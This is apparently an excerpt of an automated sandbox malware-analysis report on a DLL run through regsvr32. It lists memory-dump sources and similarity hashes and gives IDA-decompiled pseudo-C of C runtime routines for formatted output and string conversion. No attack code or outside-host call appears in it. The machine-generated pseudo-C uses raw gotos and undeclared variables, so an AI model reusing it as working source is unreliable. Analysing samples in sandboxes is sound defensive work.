                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                        • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2192614184-1870338870
                                                                                        • Opcode ID: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                                        • Instruction ID: de6734cae50e00c17b19ae97f10413d83fe6e5a887ca475c0331002d176214a7
                                                                                        • Opcode Fuzzy Hash: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                                                        • Instruction Fuzzy Hash: 66D10972A0DA828AE7B09F64E8447AFB6E0F384349F604125D6CD47AE8DB7ED545CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 19%
                                                                                        			E000007FE7FEF9D3C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                                        				signed int _t223;
                                                                                        				signed char _t228;
                                                                                        				intOrPtr _t263;
                                                                                        				signed int _t338;
                                                                                        				signed int _t339;
                                                                                        				signed long long _t342;
                                                                                        				intOrPtr* _t365;
                                                                                        				signed long long _t390;
                                                                                        
                                                                                        				_t338 = __rax;
                                                                                        				_a80 = _a80 | 0x00000040;
                                                                                        				_a72 = 0xa;
                                                                                        				_a72 = 0xa;
                                                                                        				_a116 = 0x10;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				_a708 = 7;
                                                                                        				_a708 = 0x27;
                                                                                        				_a72 = 0x10;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                                                        				_a84 = 0x30;
                                                                                        				_a85 = _a708 + 0x51;
                                                                                        				_a92 = 2;
                                                                                        				_a72 = 8;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                                                        				asm("bts eax, 0x9");
                                                                                        				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                                                        				E000007FE7FEF9D31EA0( &_a1112);
                                                                                        				_a824 = _t338;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                                                        				E000007FE7FEF9D31EA0( &_a1112);
                                                                                        				_a824 = _t338;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                                                        				_t339 = E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t339;
                                                                                        				goto 0xf9d3c80e;
                                                                                        				E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t339;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                                                        				E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t339;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t339;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                                                        				if (_a824 >= 0) goto 0xf9d3c882;
                                                                                        				_a832 =  ~_a824;
                                                                                        				asm("bts eax, 0x8");
                                                                                        				goto 0xf9d3c892;
                                                                                        				_t342 = _a824;
                                                                                        				_a832 = _t342;
                                                                                        				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                                                        				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                                                        				_a832 = _a832 & _t342;
                                                                                        				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                                                        				_a116 = 1;
                                                                                        				goto 0xf9d3c8f5;
                                                                                        				_a80 = _a80 & 0xfffffff7;
                                                                                        				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                                                        				_a116 = 0x200;
                                                                                        				if (_a832 != 0) goto 0xf9d3c908;
                                                                                        				_a92 = 0;
                                                                                        				_a64 =  &_a687;
                                                                                        				_t223 = _a116;
                                                                                        				_a116 = _a116 - 1;
                                                                                        				if (_t223 > 0) goto 0xf9d3c936;
                                                                                        				if (_a832 == 0) goto 0xf9d3c9d3;
                                                                                        				_a1040 = _a72;
                                                                                        				_a816 = _t223 / _a1040 + 0x30;
                                                                                        				_a1048 = _a72;
                                                                                        				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                                                        				_t228 = _a816 + _a708;
                                                                                        				_a816 = _t228;
                                                                                        				 *_a64 = _a816 & 0x000000ff;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				goto 0xf9d3c915;
                                                                                        				_a104 = _t228;
                                                                                        				_a64 = _a64 + 1;
                                                                                        				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                                                        				if (_a104 == 0) goto 0xf9d3ca12;
                                                                                        				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				 *_a64 = 0x30;
                                                                                        				_a104 = _a104 + 1;
                                                                                        				if (_a108 != 0) goto 0xf9d3cc6e;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                                                        				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                                                        				_a84 = 0x2d;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ca95;
                                                                                        				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                                                        				_a84 = 0x2b;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ca95;
                                                                                        				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                                                        				_a84 = 0x20;
                                                                                        				_a92 = 1;
                                                                                        				_a840 = _a88 - _a104 - _a92;
                                                                                        				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                                                        				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                                        				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                                        				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                                                        				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                                                        				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                                                        				if (_a76 == 0) goto 0xf9d3cc1d;
                                                                                        				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                                                        				_a872 = 0;
                                                                                        				_a848 = _a64;
                                                                                        				_a856 = _a104;
                                                                                        				_a856 = _a856 - 1;
                                                                                        				if (_a856 == 0) goto 0xf9d3cc1b;
                                                                                        				_a1056 =  *_a848 & 0x0000ffff;
                                                                                        				r9d = _a1056 & 0x0000ffff;
                                                                                        				r8d = 6;
                                                                                        				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                                                        				_a848 =  &(_a848[1]);
                                                                                        				if (_a872 != 0) goto 0xf9d3cbe5;
                                                                                        				if (_a860 != 0) goto 0xf9d3cbf2;
                                                                                        				_a688 = 0xffffffff;
                                                                                        				goto 0xf9d3cc1b;
                                                                                        				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                                        				goto 0xf9d3cb60;
                                                                                        				goto 0xf9d3cc3b;
                                                                                        				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                                        				if (_a688 < 0) goto 0xf9d3cc6e;
                                                                                        				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                                                        				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                                        				if (_a96 == 0) goto 0xf9d3cc8e;
                                                                                        				0xf9d25330();
                                                                                        				_a96 = 0;
                                                                                        				goto 0xf9d3b99c;
                                                                                        				if (_a704 == 0) goto 0xf9d3ccb4;
                                                                                        				if (_a704 == 7) goto 0xf9d3ccb4;
                                                                                        				_a1060 = 0;
                                                                                        				goto 0xf9d3ccbf;
                                                                                        				_a1060 = 1;
                                                                                        				_t263 = _a1060;
                                                                                        				_a876 = _t263;
                                                                                        				if (_a876 != 0) goto 0xf9d3cd05;
                                                                                        				_t365 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                        				_a32 = _t365;
                                                                                        				r9d = 0;
                                                                                        				r8d = 0x8f5;
                                                                                        				0xf9d2b3b0();
                                                                                        				if (_t263 != 1) goto 0xf9d3cd05;
                                                                                        				asm("int3");
                                                                                        				if (_a876 != 0) goto 0xf9d3cd61;
                                                                                        				0xf9d2ab30();
                                                                                        				 *_t365 = 0x16;
                                                                                        				_a32 = 0;
                                                                                        				r9d = 0x8f5;
                                                                                        				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        				_a912 = 0xffffffff;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				goto 0xf9d3cd80;
                                                                                        				_a916 = _a688;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t390, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        			}











                                                                                        0x7fef9d3c6d6
                                                                                        0x7fef9d3c6dd
                                                                                        0x7fef9d3c6e1
                                                                                        0x7fef9d3c6ee
                                                                                        0x7fef9d3c6f8
                                                                                        0x7fef9d3c704
                                                                                        0x7fef9d3c70c
                                                                                        0x7fef9d3c719
                                                                                        0x7fef9d3c724
                                                                                        0x7fef9d3c737
                                                                                        0x7fef9d3c739
                                                                                        0x7fef9d3c748
                                                                                        0x7fef9d3c74c
                                                                                        0x7fef9d3c756
                                                                                        0x7fef9d3c769
                                                                                        0x7fef9d3c76f
                                                                                        0x7fef9d3c782
                                                                                        0x7fef9d3c78c
                                                                                        0x7fef9d3c791
                                                                                        0x7fef9d3c799
                                                                                        0x7fef9d3c7a9
                                                                                        0x7fef9d3c7b3
                                                                                        0x7fef9d3c7b8
                                                                                        0x7fef9d3c7c0
                                                                                        0x7fef9d3c7ce
                                                                                        0x7fef9d3c7d9
                                                                                        0x7fef9d3c7e8
                                                                                        0x7fef9d3c7ec
                                                                                        0x7fef9d3c7f4
                                                                                        0x7fef9d3c7fe
                                                                                        0x7fef9d3c806
                                                                                        0x7fef9d3c80e
                                                                                        0x7fef9d3c819
                                                                                        0x7fef9d3c823
                                                                                        0x7fef9d3c82a
                                                                                        0x7fef9d3c832
                                                                                        0x7fef9d3c83c
                                                                                        0x7fef9d3c843
                                                                                        0x7fef9d3c854
                                                                                        0x7fef9d3c85f
                                                                                        0x7fef9d3c86c
                                                                                        0x7fef9d3c878
                                                                                        0x7fef9d3c880
                                                                                        0x7fef9d3c882
                                                                                        0x7fef9d3c88a
                                                                                        0x7fef9d3c89d
                                                                                        0x7fef9d3c8aa
                                                                                        0x7fef9d3c8bf
                                                                                        0x7fef9d3c8cc
                                                                                        0x7fef9d3c8ce
                                                                                        0x7fef9d3c8d6
                                                                                        0x7fef9d3c8df
                                                                                        0x7fef9d3c8eb
                                                                                        0x7fef9d3c8ed
                                                                                        0x7fef9d3c8fe
                                                                                        0x7fef9d3c900
                                                                                        0x7fef9d3c910
                                                                                        0x7fef9d3c915
                                                                                        0x7fef9d3c91f
                                                                                        0x7fef9d3c925
                                                                                        0x7fef9d3c930
                                                                                        0x7fef9d3c93b
                                                                                        0x7fef9d3c95e
                                                                                        0x7fef9d3c96a
                                                                                        0x7fef9d3c997
                                                                                        0x7fef9d3c9a9
                                                                                        0x7fef9d3c9ab
                                                                                        0x7fef9d3c9bf
                                                                                        0x7fef9d3c9c9
                                                                                        0x7fef9d3c9ce
                                                                                        0x7fef9d3c9e0
                                                                                        0x7fef9d3c9ec
                                                                                        0x7fef9d3c9fc
                                                                                        0x7fef9d3ca03
                                                                                        0x7fef9d3ca10
                                                                                        0x7fef9d3ca1a
                                                                                        0x7fef9d3ca24
                                                                                        0x7fef9d3ca2d
                                                                                        0x7fef9d3ca36
                                                                                        0x7fef9d3ca45
                                                                                        0x7fef9d3ca52
                                                                                        0x7fef9d3ca54
                                                                                        0x7fef9d3ca59
                                                                                        0x7fef9d3ca61
                                                                                        0x7fef9d3ca6c
                                                                                        0x7fef9d3ca6e
                                                                                        0x7fef9d3ca73
                                                                                        0x7fef9d3ca7b
                                                                                        0x7fef9d3ca86
                                                                                        0x7fef9d3ca88
                                                                                        0x7fef9d3ca8d
                                                                                        0x7fef9d3caa5
                                                                                        0x7fef9d3cab5
                                                                                        0x7fef9d3cad0
                                                                                        0x7fef9d3caee
                                                                                        0x7fef9d3cafc
                                                                                        0x7fef9d3cb07
                                                                                        0x7fef9d3cb22
                                                                                        0x7fef9d3cb2c
                                                                                        0x7fef9d3cb37
                                                                                        0x7fef9d3cb3d
                                                                                        0x7fef9d3cb4d
                                                                                        0x7fef9d3cb59
                                                                                        0x7fef9d3cb70
                                                                                        0x7fef9d3cb79
                                                                                        0x7fef9d3cb8a
                                                                                        0x7fef9d3cb92
                                                                                        0x7fef9d3cb9b
                                                                                        0x7fef9d3cbb6
                                                                                        0x7fef9d3cbc9
                                                                                        0x7fef9d3cbd9
                                                                                        0x7fef9d3cbe3
                                                                                        0x7fef9d3cbe5
                                                                                        0x7fef9d3cbf0
                                                                                        0x7fef9d3cc11
                                                                                        0x7fef9d3cc16
                                                                                        0x7fef9d3cc1b
                                                                                        0x7fef9d3cc36
                                                                                        0x7fef9d3cc43
                                                                                        0x7fef9d3cc4e
                                                                                        0x7fef9d3cc69
                                                                                        0x7fef9d3cc74
                                                                                        0x7fef9d3cc80
                                                                                        0x7fef9d3cc85
                                                                                        0x7fef9d3cc8e
                                                                                        0x7fef9d3cc9b
                                                                                        0x7fef9d3cca5
                                                                                        0x7fef9d3cca7
                                                                                        0x7fef9d3ccb2
                                                                                        0x7fef9d3ccb4
                                                                                        0x7fef9d3ccbf
                                                                                        0x7fef9d3ccc6
                                                                                        0x7fef9d3ccd5
                                                                                        0x7fef9d3ccd7
                                                                                        0x7fef9d3ccde
                                                                                        0x7fef9d3cce3
                                                                                        0x7fef9d3cce6
                                                                                        0x7fef9d3ccf8
                                                                                        0x7fef9d3cd00
                                                                                        0x7fef9d3cd02
                                                                                        0x7fef9d3cd0d
                                                                                        0x7fef9d3cd0f
                                                                                        0x7fef9d3cd14
                                                                                        0x7fef9d3cd1a
                                                                                        0x7fef9d3cd23
                                                                                        0x7fef9d3cd3e
                                                                                        0x7fef9d3cd43
                                                                                        0x7fef9d3cd53
                                                                                        0x7fef9d3cd5f
                                                                                        0x7fef9d3cd68
                                                                                        0x7fef9d3cd74
                                                                                        0x7fef9d3cd97

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: get_int64_arg$wctomb_s
                                                                                        • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                        • API String ID: 2984758162-268265396
                                                                                        • Opcode ID: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                                        • Instruction ID: a9c1e15515d35d7cf033a694107a1be22a212de4b62ef600bdbf999f0f55ea8a
                                                                                        • Opcode Fuzzy Hash: cb04687210e10a40ff2e156ef9e98a018461938d26ba5bbfa7ecca48610614c7
                                                                                        • Instruction Fuzzy Hash: 7202ED7260DBC586E7B1CB25E8857AEB7E4F384795F200125EACD86AA8DB7DD540CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                        • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                                                                        • API String ID: 2192614184-660564692
                                                                                        • Opcode ID: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                                        • Instruction ID: 92bf99913cb81df5d7f4b76c0ee557dab353d6c18ff2e6375d0d5446e39197ae
                                                                                        • Opcode Fuzzy Hash: 195fbd3003f3c87b3f41f90d73ab024ba3d25bb3ae880b5a9c818d30aa2f9b48
                                                                                        • Instruction Fuzzy Hash: 8DE10C31A0DBC685E7B09B14E8457AEA3E0F384754FA04626D6DD53AE8DF7ED484CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 57%
                                                                                        			E000007FE7FEF9D355F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
                                                                                        				long long _v24;
                                                                                        				long long _v32;
                                                                                        				long long _v40;
                                                                                        				long long _v48;
                                                                                        				long long _v56;
                                                                                        				void* _v64;
                                                                                        				long long _v72;
                                                                                        				void* _t88;
                                                                                        				void* _t89;
                                                                                        				void* _t107;
                                                                                        				void* _t109;
                                                                                        				signed int* _t158;
                                                                                        				signed int* _t160;
                                                                                        				long long _t175;
                                                                                        				long long _t186;
                                                                                        				signed int* _t187;
                                                                                        				signed int* _t193;
                                                                                        
                                                                                        				_a32 = __r9;
                                                                                        				_a24 = __r8;
                                                                                        				_a16 = __rdx;
                                                                                        				_a8 = __rcx;
                                                                                        				_v72 = 0;
                                                                                        				_t158 = _a24;
                                                                                        				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0xf9d35639;
                                                                                        				_t89 = E000007FE7FEF9D2E680(_t88, _t158);
                                                                                        				_v56 = _t158 + _a24[1];
                                                                                        				goto 0xf9d35642;
                                                                                        				_v56 = 0;
                                                                                        				if (_v56 == 0) goto 0xf9d356aa;
                                                                                        				_t160 = _a24;
                                                                                        				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0xf9d35673;
                                                                                        				E000007FE7FEF9D2E680(_t89, _t160);
                                                                                        				_v48 = _t160 + _a24[1];
                                                                                        				goto 0xf9d3567c;
                                                                                        				_v48 = 0;
                                                                                        				if ( *((char*)(_v48 + 0x10)) == 0) goto 0xf9d356aa;
                                                                                        				if (_a24[2] != 0) goto 0xf9d356b1;
                                                                                        				if (( *_a24 & 0x80000000) != 0) goto 0xf9d356b1;
                                                                                        				goto 0xf9d35966;
                                                                                        				if (( *_a24 & 0x80000000) == 0) goto 0xf9d356d0;
                                                                                        				_v64 = _a16;
                                                                                        				goto 0xf9d356e9;
                                                                                        				_v64 = _a24[2] +  *_a16;
                                                                                        				if (( *_a24 & 0x00000008) == 0) goto 0xf9d35765;
                                                                                        				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d3575b;
                                                                                        				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d3575b;
                                                                                        				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
                                                                                        				_t175 = _v64;
                                                                                        				E000007FE7FEF9D35B30(_t100,  *_t175,  &(_a32[2]));
                                                                                        				 *_v64 = _t175;
                                                                                        				goto 0xf9d35760;
                                                                                        				E000007FE7FEF9D2CF80(_t175);
                                                                                        				goto 0xf9d3595a;
                                                                                        				if (( *_a32 & 0x00000001) == 0) goto 0xf9d35813;
                                                                                        				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35809;
                                                                                        				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35809;
                                                                                        				_t107 = E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
                                                                                        				if (_a32[5] != 8) goto 0xf9d35807;
                                                                                        				if ( *_v64 == 0) goto 0xf9d35807;
                                                                                        				_t186 = _v64;
                                                                                        				E000007FE7FEF9D35B30(_t107,  *_t186,  &(_a32[2]));
                                                                                        				 *_v64 = _t186;
                                                                                        				goto 0xf9d3580e;
                                                                                        				_t109 = E000007FE7FEF9D2CF80(_t186);
                                                                                        				goto 0xf9d3595a;
                                                                                        				_t187 = _a32;
                                                                                        				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0xf9d3583c;
                                                                                        				E000007FE7FEF9D2E6A0(_t109, _t187);
                                                                                        				_v40 = _t187 + _a32[6];
                                                                                        				goto 0xf9d35845;
                                                                                        				_v40 = 0;
                                                                                        				if (_v40 != 0) goto 0xf9d358c6;
                                                                                        				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d358bc;
                                                                                        				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d358bc;
                                                                                        				_t191 = _a32[5];
                                                                                        				_v32 = _a32[5];
                                                                                        				E000007FE7FEF9D35B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
                                                                                        				E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64, _a32[5], _v32);
                                                                                        				goto 0xf9d358c1;
                                                                                        				E000007FE7FEF9D2CF80(_t191);
                                                                                        				goto 0xf9d3595a;
                                                                                        				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35955;
                                                                                        				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35955;
                                                                                        				_t193 = _a32;
                                                                                        				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0xf9d35919;
                                                                                        				E000007FE7FEF9D2E6A0(_t117, _t193);
                                                                                        				_v24 = _t193 + _a32[6];
                                                                                        				goto 0xf9d35922;
                                                                                        				_v24 = 0;
                                                                                        				if (E000007FE7FEF9D3D2F0(_v24) == 0) goto 0xf9d35955;
                                                                                        				_t195 = _a32;
                                                                                        				if (( *_a32 & 0x00000004) == 0) goto 0xf9d3594b;
                                                                                        				_v72 = 2;
                                                                                        				goto 0xf9d35953;
                                                                                        				_v72 = 1;
                                                                                        				goto 0xf9d3595a;
                                                                                        				E000007FE7FEF9D2CF80(_a32);
                                                                                        				E000007FE7FEF9D2CF50(_t195);
                                                                                        				return _v72;
                                                                                        			}




















                                                                                        0x7fef9d355f0
                                                                                        0x7fef9d355f5
                                                                                        0x7fef9d355fa
                                                                                        0x7fef9d355ff
                                                                                        0x7fef9d35608
                                                                                        0x7fef9d35610
                                                                                        0x7fef9d3561c
                                                                                        0x7fef9d3561e
                                                                                        0x7fef9d35632
                                                                                        0x7fef9d35637
                                                                                        0x7fef9d35639
                                                                                        0x7fef9d35648
                                                                                        0x7fef9d3564a
                                                                                        0x7fef9d35656
                                                                                        0x7fef9d35658
                                                                                        0x7fef9d3566c
                                                                                        0x7fef9d35671
                                                                                        0x7fef9d35673
                                                                                        0x7fef9d35687
                                                                                        0x7fef9d35695
                                                                                        0x7fef9d356a8
                                                                                        0x7fef9d356ac
                                                                                        0x7fef9d356c2
                                                                                        0x7fef9d356c9
                                                                                        0x7fef9d356ce
                                                                                        0x7fef9d356e4
                                                                                        0x7fef9d356f8
                                                                                        0x7fef9d3570f
                                                                                        0x7fef9d35722
                                                                                        0x7fef9d35732
                                                                                        0x7fef9d35744
                                                                                        0x7fef9d3574c
                                                                                        0x7fef9d35756
                                                                                        0x7fef9d35759
                                                                                        0x7fef9d3575b
                                                                                        0x7fef9d35760
                                                                                        0x7fef9d35774
                                                                                        0x7fef9d3578f
                                                                                        0x7fef9d357a2
                                                                                        0x7fef9d357c1
                                                                                        0x7fef9d357d6
                                                                                        0x7fef9d357e1
                                                                                        0x7fef9d357f2
                                                                                        0x7fef9d357fa
                                                                                        0x7fef9d35804
                                                                                        0x7fef9d35807
                                                                                        0x7fef9d35809
                                                                                        0x7fef9d3580e
                                                                                        0x7fef9d35813
                                                                                        0x7fef9d3581f
                                                                                        0x7fef9d35821
                                                                                        0x7fef9d35835
                                                                                        0x7fef9d3583a
                                                                                        0x7fef9d3583c
                                                                                        0x7fef9d3584b
                                                                                        0x7fef9d35862
                                                                                        0x7fef9d35875
                                                                                        0x7fef9d3587f
                                                                                        0x7fef9d35883
                                                                                        0x7fef9d358a0
                                                                                        0x7fef9d358b5
                                                                                        0x7fef9d358ba
                                                                                        0x7fef9d358bc
                                                                                        0x7fef9d358c1
                                                                                        0x7fef9d358db
                                                                                        0x7fef9d358ee
                                                                                        0x7fef9d358f0
                                                                                        0x7fef9d358fc
                                                                                        0x7fef9d358fe
                                                                                        0x7fef9d35912
                                                                                        0x7fef9d35917
                                                                                        0x7fef9d35919
                                                                                        0x7fef9d3592e
                                                                                        0x7fef9d35930
                                                                                        0x7fef9d3593f
                                                                                        0x7fef9d35941
                                                                                        0x7fef9d35949
                                                                                        0x7fef9d3594b
                                                                                        0x7fef9d35953
                                                                                        0x7fef9d35955
                                                                                        0x7fef9d3595c
                                                                                        0x7fef9d3596a

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                                                                        • String ID:
                                                                                        • API String ID: 801082872-0
                                                                                        • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                                        • Instruction ID: 9d611a2ef42a4ce54476322da2bce67ea854ec722e2e267300ecfa65af3b148c
                                                                                        • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                                                                        • Instruction Fuzzy Hash: 4DA13D32B0CA4682EAA08B16E89077E67E0F7C4B95F208121DACD877B5DF3ED451CB10
                                                                                        Uniqueness

